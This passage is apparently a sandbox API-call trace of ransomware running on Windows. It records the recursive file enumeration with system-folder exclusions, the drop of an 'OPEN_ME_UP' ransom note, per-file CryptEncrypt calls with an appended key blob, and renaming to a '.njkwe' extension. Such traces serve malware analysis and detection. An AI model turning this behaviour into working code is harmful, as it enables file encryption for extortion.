ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0060.533] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0060.533] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 50 [0060.533] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\$getcurrent\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.534] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380fa74, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380fa74*=0x351, lpOverlapped=0x0) returned 1 [0060.535] CloseHandle (hObject=0x424) returned 1 [0060.535] GetProcessHeap () returned 0xbe0000 [0060.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0060.535] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0060.535] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0060.535] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$Recycle.bin") returned 0 [0060.535] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0060.535] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Windows") returned -1 [0060.535] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="$Recycle.bin") returned 1 [0060.535] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="System Volume Information") returned -1 [0060.535] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Program Files") returned -1 [0060.535] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Program Files (x86)") returned -1 [0060.535] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 37 [0060.535] StrStrIW (lpFirst="$WINRE_BACKUP_PARTITION.MARKER", lpSrch=".njkwe") returned 0x0 [0060.535] lstrcmpW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0060.535] lstrcmpW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="taridd") returned -1 [0060.535] StrCmpNW (lpStr1="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.535] CreateFileW (lpFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.536] GetTickCount () returned 0x114f917 [0060.536] GetTickCount () returned 0x114f917 [0060.536] GetTickCount () returned 0x114f917 [0060.536] GetTickCount () returned 0x114f917 [0060.536] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380fc40*, pdwDataLen=0x380fcf0*=0x2c, dwBufLen=0x80 | out: pbData=0x380fc40*, pdwDataLen=0x380fcf0*=0x80) returned 1 [0060.536] GetProcessHeap () returned 0xbe0000 [0060.536] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.536] ReadFile (in: hFile=0x424, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fcf4*=0x0, lpOverlapped=0x0) returned 1 [0060.536] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.536] WriteFile (in: hFile=0x424, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fcf4*=0x0, lpOverlapped=0x0) returned 1 [0060.537] GetProcessHeap () returned 0xbe0000 [0060.537] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.537] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.537] WriteFile (in: hFile=0x424, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fcf4*=0x300, lpOverlapped=0x0) returned 1 [0060.538] WriteFile (in: hFile=0x424, lpBuffer=0x380fc40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0x380fc40*, lpNumberOfBytesWritten=0x380fcf4*=0x80, lpOverlapped=0x0) returned 1 [0060.538] WriteFile (in: hFile=0x424, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fcf4*=0x4, lpOverlapped=0x0) returned 1 [0060.538] CloseHandle (hObject=0x424) returned 1 [0060.538] GetProcessHeap () returned 0xbe0000 [0060.538] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0060.538] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER_r00t_{3sXlE5}.njkwe") returned 57 [0060.539] MoveFileW (lpExistingFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), lpNewFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$winre_backup_partition.marker_r00t_{3sxle5}.njkwe")) returned 1 [0060.539] GetProcessHeap () returned 0xbe0000 [0060.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0060.539] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0060.539] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Windows") returned -1 [0060.539] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="$Recycle.bin") returned 1 [0060.539] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="System Volume Information") returned -1 [0060.539] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Program Files") returned -1 [0060.539] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Program Files (x86)") returned -1 [0060.539] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212") returned 25 [0060.539] lstrcmpW (lpString1="588bce7c90097ed212", lpString2=".") returned 1 [0060.539] lstrcmpW (lpString1="588bce7c90097ed212", lpString2="..") returned 1 [0060.539] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.539] GetProcessHeap () returned 0xbe0000 [0060.539] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0060.539] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\*") returned 27 [0060.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0060.582] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.582] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.582] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.582] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.582] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.582] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\.") returned 27 [0060.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.582] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.583] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.583] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.583] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.583] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.583] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.583] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\..") returned 28 [0060.583] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.583] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.583] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1025", cAlternateFileName="")) returned 1 [0060.583] lstrcmpiW (lpString1="1025", lpString2="Windows") returned -1 [0060.583] lstrcmpiW (lpString1="1025", lpString2="$Recycle.bin") returned 1 [0060.583] lstrcmpiW (lpString1="1025", lpString2="System Volume Information") returned -1 [0060.583] lstrcmpiW (lpString1="1025", lpString2="Program Files") returned -1 [0060.583] lstrcmpiW (lpString1="1025", lpString2="Program Files (x86)") returned -1 [0060.583] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025") returned 30 [0060.583] lstrcmpW (lpString1="1025", lpString2=".") returned 1 [0060.583] lstrcmpW (lpString1="1025", lpString2="..") returned 1 [0060.583] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.583] GetProcessHeap () returned 0xbe0000 [0060.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.583] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\*") returned 32 [0060.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ee0 [0060.584] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.584] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.584] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.584] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.584] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.584] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\.") returned 32 [0060.584] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.584] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.584] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.584] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.584] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.584] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.584] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.584] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\..") returned 33 [0060.584] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.584] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.584] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.584] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.584] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.584] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.584] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.584] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.584] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 39 [0060.585] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.585] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.585] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.585] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.585] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.586] GetTickCount () returned 0x114f946 [0060.586] GetTickCount () returned 0x114f946 [0060.586] GetTickCount () returned 0x114f946 [0060.586] GetTickCount () returned 0x114f946 [0060.586] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.586] GetProcessHeap () returned 0xbe0000 [0060.586] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.586] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x1d8f, lpOverlapped=0x0) returned 1 [0060.588] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffe271, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.588] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x1d8f, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x1d8f, lpOverlapped=0x0) returned 1 [0060.588] GetProcessHeap () returned 0xbe0000 [0060.588] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.588] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.588] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.588] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.589] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.589] CloseHandle (hObject=0x42c) returned 1 [0060.590] GetProcessHeap () returned 0xbe0000 [0060.590] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.590] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.592] GetProcessHeap () returned 0xbe0000 [0060.592] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.592] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.592] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.592] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.592] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.592] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.592] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.592] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 48 [0060.592] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.592] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.592] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.592] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.593] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.593] GetTickCount () returned 0x114f946 [0060.593] GetTickCount () returned 0x114f946 [0060.593] GetTickCount () returned 0x114f946 [0060.593] GetTickCount () returned 0x114f946 [0060.593] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.593] GetProcessHeap () returned 0xbe0000 [0060.593] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.593] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.595] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.595] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.596] GetProcessHeap () returned 0xbe0000 [0060.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.596] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.596] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.596] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.596] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.596] CloseHandle (hObject=0x42c) returned 1 [0060.599] GetProcessHeap () returned 0xbe0000 [0060.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.599] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0060.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0060.599] GetProcessHeap () returned 0xbe0000 [0060.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.599] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, 